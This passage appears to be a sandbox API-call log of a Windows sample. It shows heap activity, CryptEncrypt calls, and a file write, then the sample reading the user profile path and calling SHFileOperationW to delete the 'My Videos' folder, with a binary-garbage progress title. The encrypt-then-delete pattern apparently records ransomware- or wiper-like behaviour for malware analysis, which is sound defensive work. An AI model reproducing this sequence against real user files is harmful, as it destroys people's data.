hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0219.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0219.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0219.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaba88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0219.272] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0219.272] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0219.273] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.273] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.273] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0219.273] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71eb8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71eb8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0219.273] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0219.273] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0219.273] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0219.273] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0219.273] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.273] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.273] WriteFile (in: hFile=0x4ac, lpBuffer=0x2a71ea8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71ea8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0219.274] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0219.274] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0219.274] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.274] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0219.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab848, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0219.274] CryptDestroyKey (hKey=0x9e1bf8) returned 1 [0219.274] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0219.275] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0219.275] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0219.275] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0219.275] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.275] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.275] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0219.302] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0219.303] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0219.303] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0219.303] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.303] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.303] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.303] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.303] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0219.303] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0219.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0219.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0219.303] CryptReleaseContext (hProv=0xa7be68, dwFlags=0x0) returned 1 [0219.303] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.303] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.303] FreeLibrary (hLibModule=0x76390000) returned 1 [0219.303] CloseHandle (hObject=0x4ac) returned 1 [0219.304] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0219.304] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0219.304] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Videos", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Videos", lpFilePart=0x8cedf4*="My Videos") returned 0x23 [0219.304] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Videos" (normalized: "c:\\users\\fd1hvy\\documents\\my videos")) returned 0x2416 [0219.304] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Videos\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x17, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x120a58, ftLastAccessTime.dwLowDateTime=0x47558b, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x7626d180, nFileSizeLow=0x4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="", cAlternateFileName="")) returned 0xffffffff [0219.304] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0219.304] GetLastError () returned 0x6 [0219.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854380 | out: hHeap=0x2af0000) returned 1 [0219.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0219.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.304] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0219.305] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae88 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0219.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaeb8 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0219.305] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0219.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0219.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0219.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0219.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0219.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854380 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0219.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0219.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0219.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0219.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0219.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0219.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0219.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5d7f0 [0219.307] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Videos", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Videos", lpFilePart=0x8cf650*="My Videos") returned 0x23 [0219.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d7f0 | out: hHeap=0x2af0000) returned 1 [0219.307] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Videos" (normalized: "c:\\users\\fd1hvy\\documents\\my videos")) returned 0x2416 [0219.307] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\My Videos", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖